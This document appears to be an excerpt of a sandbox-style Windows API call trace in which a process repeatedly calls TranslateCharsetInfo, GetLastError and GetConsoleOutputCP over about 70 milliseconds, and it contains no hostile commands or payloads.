	[0059.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.296] GetLastError () returned 0xcb
	[0059.296] GetConsoleOutputCP () returned 0x1b5
	[0059.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.296] GetLastError () returned 0xcb
	[0059.296] GetConsoleOutputCP () returned 0x1b5
	[0059.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.296] GetLastError () returned 0xcb
	[0059.296] GetConsoleOutputCP () returned 0x1b5
	[0059.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.296] GetLastError () returned 0xcb
	[0059.296] GetConsoleOutputCP () returned 0x1b5
	[0059.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.296] GetLastError () returned 0xcb
	[0059.297] GetConsoleOutputCP () returned 0x1b5
	[0059.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.297] GetLastError () returned 0xcb
	[0059.297] GetConsoleOutputCP () returned 0x1b5
	[0059.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.297] GetLastError () returned 0xcb
	[0059.297] GetConsoleOutputCP () returned 0x1b5
	[0059.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.297] GetLastError () returned 0xcb
	[0059.297] GetConsoleOutputCP () returned 0x1b5
	[0059.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.297] GetLastError () returned 0xcb
	[0059.297] GetConsoleOutputCP () returned 0x1b5
	[0059.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.297] GetLastError () returned 0xcb
	[0059.297] GetConsoleOutputCP () returned 0x1b5
	[0059.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.298] GetLastError () returned 0xcb
	[0059.298] GetConsoleOutputCP () returned 0x1b5
	[0059.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.298] GetLastError () returned 0xcb
	[0059.298] GetConsoleOutputCP () returned 0x1b5
	[0059.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.298] GetLastError () returned 0xcb
	[0059.298] GetConsoleOutputCP () returned 0x1b5
	[0059.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.298] GetLastError () returned 0xcb
	[0059.298] GetConsoleOutputCP () returned 0x1b5
	[0059.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.298] GetLastError () returned 0xcb
	[0059.298] GetConsoleOutputCP () returned 0x1b5
	[0059.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.298] GetLastError () returned 0xcb
	[0059.298] GetConsoleOutputCP () returned 0x1b5
	[0059.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.299] GetLastError () returned 0xcb
	[0059.299] GetConsoleOutputCP () returned 0x1b5
	[0059.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.299] GetLastError () returned 0xcb
	[0059.299] GetConsoleOutputCP () returned 0x1b5
	[0059.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.299] GetLastError () returned 0xcb
	[0059.299] GetConsoleOutputCP () returned 0x1b5
	[0059.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.299] GetLastError () returned 0xcb
	[0059.299] GetConsoleOutputCP () returned 0x1b5
	[0059.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.299] GetLastError () returned 0xcb
	[0059.299] GetConsoleOutputCP () returned 0x1b5
	[0059.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.299] GetLastError () returned 0xcb
	[0059.299] GetConsoleOutputCP () returned 0x1b5
	[0059.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.300] GetLastError () returned 0xcb
	[0059.300] GetConsoleOutputCP () returned 0x1b5
	[0059.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.300] GetLastError () returned 0xcb
	[0059.300] GetConsoleOutputCP () returned 0x1b5
	[0059.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.300] GetLastError () returned 0xcb
	[0059.300] GetConsoleOutputCP () returned 0x1b5
	[0059.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.300] GetLastError () returned 0xcb
	[0059.300] GetConsoleOutputCP () returned 0x1b5
	[0059.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.300] GetLastError () returned 0xcb
	[0059.300] GetConsoleOutputCP () returned 0x1b5
	[0059.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.300] GetLastError () returned 0xcb
	[0059.300] GetConsoleOutputCP () returned 0x1b5
	[0059.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.301] GetLastError () returned 0xcb
	[0059.301] GetConsoleOutputCP () returned 0x1b5
	[0059.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.301] GetLastError () returned 0xcb
	[0059.301] GetConsoleOutputCP () returned 0x1b5
	[0059.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.301] GetLastError () returned 0xcb
	[0059.301] GetConsoleOutputCP () returned 0x1b5
	[0059.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.301] GetLastError () returned 0xcb
	[0059.301] GetConsoleOutputCP () returned 0x1b5
	[0059.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.301] GetLastError () returned 0xcb
	[0059.301] GetConsoleOutputCP () returned 0x1b5
	[0059.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.301] GetLastError () returned 0xcb
	[0059.301] GetConsoleOutputCP () returned 0x1b5
	[0059.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.302] GetLastError () returned 0xcb
	[0059.302] GetConsoleOutputCP () returned 0x1b5
	[0059.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.302] GetLastError () returned 0xcb
	[0059.302] GetConsoleOutputCP () returned 0x1b5
	[0059.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.302] GetLastError () returned 0xcb
	[0059.302] GetConsoleOutputCP () returned 0x1b5
	[0059.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.302] GetLastError () returned 0xcb
	[0059.302] GetConsoleOutputCP () returned 0x1b5
	[0059.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.302] GetLastError () returned 0xcb
	[0059.302] GetConsoleOutputCP () returned 0x1b5
	[0059.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.302] GetLastError () returned 0xcb
	[0059.303] GetConsoleOutputCP () returned 0x1b5
	[0059.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.303] GetLastError () returned 0xcb
	[0059.303] GetConsoleOutputCP () returned 0x1b5
	[0059.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.303] GetLastError () returned 0xcb
	[0059.303] GetConsoleOutputCP () returned 0x1b5
	[0059.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.303] GetLastError () returned 0xcb
	[0059.303] GetConsoleOutputCP () returned 0x1b5
	[0059.304] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.304] GetLastError () returned 0xcb
	[0059.304] GetConsoleOutputCP () returned 0x1b5
	[0059.304] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.304] GetLastError () returned 0xcb
	[0059.304] GetConsoleOutputCP () returned 0x1b5
	[0059.304] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.304] GetLastError () returned 0xcb
	[0059.304] GetConsoleOutputCP () returned 0x1b5
	[0059.304] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.304] GetLastError () returned 0xcb
	[0059.304] GetConsoleOutputCP () returned 0x1b5
	[0059.304] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.304] GetLastError () returned 0xcb
	[0059.304] GetConsoleOutputCP () returned 0x1b5
	[0059.304] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.304] GetLastError () returned 0xcb
	[0059.304] GetConsoleOutputCP () returned 0x1b5
	[0059.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.305] GetLastError () returned 0xcb
	[0059.305] GetConsoleOutputCP () returned 0x1b5
	[0059.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.305] GetLastError () returned 0xcb
	[0059.305] GetConsoleOutputCP () returned 0x1b5
	[0059.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.305] GetLastError () returned 0xcb
	[0059.305] GetConsoleOutputCP () returned 0x1b5
	[0059.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.305] GetLastError () returned 0xcb
	[0059.305] GetConsoleOutputCP () returned 0x1b5
	[0059.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.305] GetLastError () returned 0xcb
	[0059.305] GetConsoleOutputCP () returned 0x1b5
	[0059.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.305] GetLastError () returned 0xcb
	[0059.306] GetConsoleOutputCP () returned 0x1b5
	[0059.306] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.306] GetLastError () returned 0xcb
	[0059.306] GetConsoleOutputCP () returned 0x1b5
	[0059.306] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.306] GetLastError () returned 0xcb
	[0059.306] GetConsoleOutputCP () returned 0x1b5
	[0059.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.359] GetLastError () returned 0xcb
	[0059.359] GetConsoleOutputCP () returned 0x1b5
	[0059.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.359] GetLastError () returned 0xcb
	[0059.359] GetConsoleOutputCP () returned 0x1b5
	[0059.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.359] GetLastError () returned 0xcb
	[0059.359] GetConsoleOutputCP () returned 0x1b5
	[0059.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.359] GetLastError () returned 0xcb
	[0059.359] GetConsoleOutputCP () returned 0x1b5
	[0059.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.359] GetLastError () returned 0xcb
	[0059.359] GetConsoleOutputCP () returned 0x1b5
	[0059.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.359] GetLastError () returned 0xcb
	[0059.360] GetConsoleOutputCP () returned 0x1b5
	[0059.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.360] GetLastError () returned 0xcb
	[0059.360] GetConsoleOutputCP () returned 0x1b5
	[0059.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.360] GetLastError () returned 0xcb
	[0059.360] GetConsoleOutputCP () returned 0x1b5
	[0059.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.360] GetLastError () returned 0xcb
	[0059.360] GetConsoleOutputCP () returned 0x1b5
	[0059.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.360] GetLastError () returned 0xcb
	[0059.360] GetConsoleOutputCP () returned 0x1b5
	[0059.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.360] GetLastError () returned 0xcb
	[0059.360] GetConsoleOutputCP () returned 0x1b5
	[0059.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.360] GetLastError () returned 0xcb
	[0059.361] GetConsoleOutputCP () returned 0x1b5
	[0059.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.361] GetLastError () returned 0xcb
	[0059.361] GetConsoleOutputCP () returned 0x1b5
	[0059.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.361] GetLastError () returned 0xcb
	[0059.361] GetConsoleOutputCP () returned 0x1b5
	[0059.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.361] GetLastError () returned 0xcb
	[0059.361] GetConsoleOutputCP () returned 0x1b5
	[0059.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.361] GetLastError () returned 0xcb
	[0059.361] GetConsoleOutputCP () returned 0x1b5
	[0059.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.361] GetLastError () returned 0xcb
	[0059.361] GetConsoleOutputCP () returned 0x1b5
	[0059.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.362] GetLastError () returned 0xcb
	[0059.362] GetConsoleOutputCP () returned 0x1b5
	[0059.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.362] GetLastError () returned 0xcb
	[0059.362] GetConsoleOutputCP () returned 0x1b5
	[0059.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.362] GetLastError () returned 0xcb
	[0059.362] GetConsoleOutputCP () returned 0x1b5
	[0059.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.362] GetLastError () returned 0xcb
	[0059.362] GetConsoleOutputCP () returned 0x1b5
	[0059.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.362] GetLastError () returned 0xcb
	[0059.362] GetConsoleOutputCP () returned 0x1b5
	[0059.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.362] GetLastError () returned 0xcb
	[0059.362] GetConsoleOutputCP () returned 0x1b5
	[0059.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.363] GetLastError () returned 0xcb
	[0059.363] GetConsoleOutputCP () returned 0x1b5
	[0059.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.363] GetLastError () returned 0xcb
	[0059.363] GetConsoleOutputCP () returned 0x1b5
	[0059.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.363] GetLastError () returned 0xcb
	[0059.363] GetConsoleOutputCP () returned 0x1b5
	[0059.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.363] GetLastError () returned 0xcb
	[0059.363] GetConsoleOutputCP () returned 0x1b5
	[0059.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.363] GetLastError () returned 0xcb
	[0059.363] GetConsoleOutputCP () returned 0x1b5
	[0059.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.363] GetLastError () returned 0xcb
	[0059.363] GetConsoleOutputCP () returned 0x1b5
	[0059.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.364] GetLastError () returned 0xcb
	[0059.364] GetConsoleOutputCP () returned 0x1b5
	[0059.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.364] GetLastError () returned 0xcb
	[0059.364] GetConsoleOutputCP () returned 0x1b5
	[0059.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.364] GetLastError () returned 0xcb
	[0059.364] GetConsoleOutputCP () returned 0x1b5
	[0059.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.364] GetLastError () returned 0xcb
	[0059.364] GetConsoleOutputCP () returned 0x1b5
	[0059.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.364] GetLastError () returned 0xcb
	[0059.364] GetConsoleOutputCP () returned 0x1b5
	[0059.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.364] GetLastError () returned 0xcb
	[0059.364] GetConsoleOutputCP () returned 0x1b5
	[0059.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.365] GetLastError () returned 0xcb
	[0059.365] GetConsoleOutputCP () returned 0x1b5
	[0059.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.365] GetLastError () returned 0xcb
	[0059.365] GetConsoleOutputCP () returned 0x1b5
	[0059.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.365] GetLastError () returned 0xcb
	[0059.365] GetConsoleOutputCP () returned 0x1b5
	[0059.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.365] GetLastError () returned 0xcb
	[0059.365] GetConsoleOutputCP () returned 0x1b5
	[0059.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.365] GetLastError () returned 0xcb
	[0059.365] GetConsoleOutputCP () returned 0x1b5
	[0059.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.365] GetLastError () returned 0xcb
	[0059.365] GetConsoleOutputCP () returned 0x1b5
	[0059.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.366] GetLastError () returned 0xcb
	[0059.366] GetConsoleOutputCP () returned 0x1b5
	[0059.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.366] GetLastError () returned 0xcb
	[0059.366] GetConsoleOutputCP () returned 0x1b5
	[0059.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.366] GetLastError () returned 0xcb
	[0059.366] GetConsoleOutputCP () returned 0x1b5
	[0059.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.366] GetLastError () returned 0xcb
	[0059.366] GetConsoleOutputCP () returned 0x1b5
	[0059.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.366] GetLastError () returned 0xcb
	[0059.366] GetConsoleOutputCP () returned 0x1b5
	[0059.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.367] GetLastError () returned 0xcb
	[0059.367] GetConsoleOutputCP () returned 0x1b5
	[0059.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.367] GetLastError () returned 0xcb
	[0059.367] GetConsoleOutputCP () returned 0x1b5
	[0059.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.367] GetLastError () returned 0xcb
	[0059.367] GetConsoleOutputCP () returned 0x1b5
	[0059.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.367] GetLastError () returned 0xcb
	[0059.367] GetConsoleOutputCP () returned 0x1b5
	[0059.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.367] GetLastError () returned 0xcb
	[0059.367] GetConsoleOutputCP () returned 0x1b5
	[0059.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.367] GetLastError () returned 0xcb
	[0059.367] GetConsoleOutputCP () returned 0x1b5
	[0059.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.368] GetLastError () returned 0xcb
	[0059.368] GetConsoleOutputCP () returned 0x1b5
